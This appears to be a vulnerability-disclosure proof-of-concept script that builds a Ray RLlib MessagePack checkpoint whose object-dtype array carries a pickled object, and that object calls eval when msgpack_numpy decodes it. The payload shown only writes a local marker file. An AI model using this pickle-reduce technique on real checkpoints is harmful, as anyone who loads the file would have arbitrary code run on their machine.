File size: 1,814 Bytes
2a3c1ea
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
#!/usr/bin/env python
"""Build a benign Ray RLlib MessagePack checkpoint PoC artifact."""

from __future__ import annotations

import hashlib
import json
from pathlib import Path

import msgpack_numpy
import numpy as np


# File name of the MessagePack artifact that main() writes next to this script.
ARTIFACT_NAME = "state.msgpack"
# File name the Marker payload writes to; also recorded in the manifest.
MARKER_NAME = "MSG_PACK_NUMPY_MARKER.txt"
# Exact text written into the marker file (the manifest stores it stripped).
MARKER_TEXT = "msgpack_numpy_object_array_marker\n"


class Marker:
    """Placeholder object whose pickled form writes a local marker file.

    The class carries no state. Its only purpose is the reduction returned by
    ``__reduce__``: when an instance is pickled and later unpickled, the
    unpickler calls ``eval`` on an expression that writes ``MARKER_TEXT`` to
    ``MARKER_NAME``. The path is relative, so the file is created in the
    working directory of whichever process performs the unpickling.
    """

    def __reduce__(self):
        """Return the ``(callable, args)`` pair pickle uses to rebuild this object."""
        # Benign local marker-file proof. No network, persistence, or destructive action.
        write_marker_expr = (
            "__import__('pathlib').Path(%r).write_text(%r, encoding='utf-8')"
        ) % (MARKER_NAME, MARKER_TEXT)
        return eval, (write_marker_expr,)


def sha256(path: Path) -> str:
    """Return the hexadecimal SHA-256 digest of the file at *path*.

    The file is opened in binary mode and consumed in 1 MiB pieces so the
    whole content never has to be held in memory at once.
    """
    chunk_size = 1024 * 1024
    hasher = hashlib.sha256()
    with path.open("rb") as stream:
        while True:
            block = stream.read(chunk_size)
            if block == b"":
                # An empty read signals end of file.
                break
            hasher.update(block)
    return hasher.hexdigest()


def main() -> None:
    """Write the PoC artifact and its JSON manifest beside this script.

    Steps, in order:

    1. Pack a small state dict (a float32 array plus an object-dtype array
       holding one ``Marker``) with ``msgpack_numpy.packb`` and write the
       bytes to ``ARTIFACT_NAME``.
    2. Build a manifest recording the artifact's name, SHA-256, size, and
       the marker file details.
    3. Save the manifest as ``artifact_manifest.json`` and echo the same
       JSON to stdout.

    Both files land in the directory containing this script, regardless of
    the current working directory.
    """
    script_dir = Path(__file__).resolve().parent
    artifact_path = script_dir / ARTIFACT_NAME
    manifest_path = script_dir / "artifact_manifest.json"

    # The object-dtype entry is the part of the state that carries the Marker.
    checkpoint_state = {
        "format": "ray_rllib_state_msgpack",
        "safe_weights": np.array([1.0, 2.0, 3.0], dtype=np.float32),
        "object_array": np.array([Marker()], dtype=object),
    }
    packed = msgpack_numpy.packb(checkpoint_state, use_bin_type=True)
    artifact_path.write_bytes(packed)

    # Hash and size are taken from the file on disk, after it has been written.
    artifact_digest = sha256(artifact_path)
    artifact_size = artifact_path.stat().st_size
    manifest = {
        "artifact": ARTIFACT_NAME,
        "sha256": artifact_digest,
        "size_bytes": artifact_size,
        "marker_file": MARKER_NAME,
        "marker_text": MARKER_TEXT.strip(),
        "impact": "Benign marker file is created when a loader decodes the object-dtype array through msgpack-numpy.",
    }

    # Render once; the file gets a trailing newline, stdout gets print()'s own.
    manifest_json = json.dumps(manifest, indent=2)
    manifest_path.write_text(manifest_json + "\n", encoding="utf-8")
    print(manifest_json)


# Build the artifact only when run as a script; importing this module has no side effects.
if __name__ == "__main__":
    main()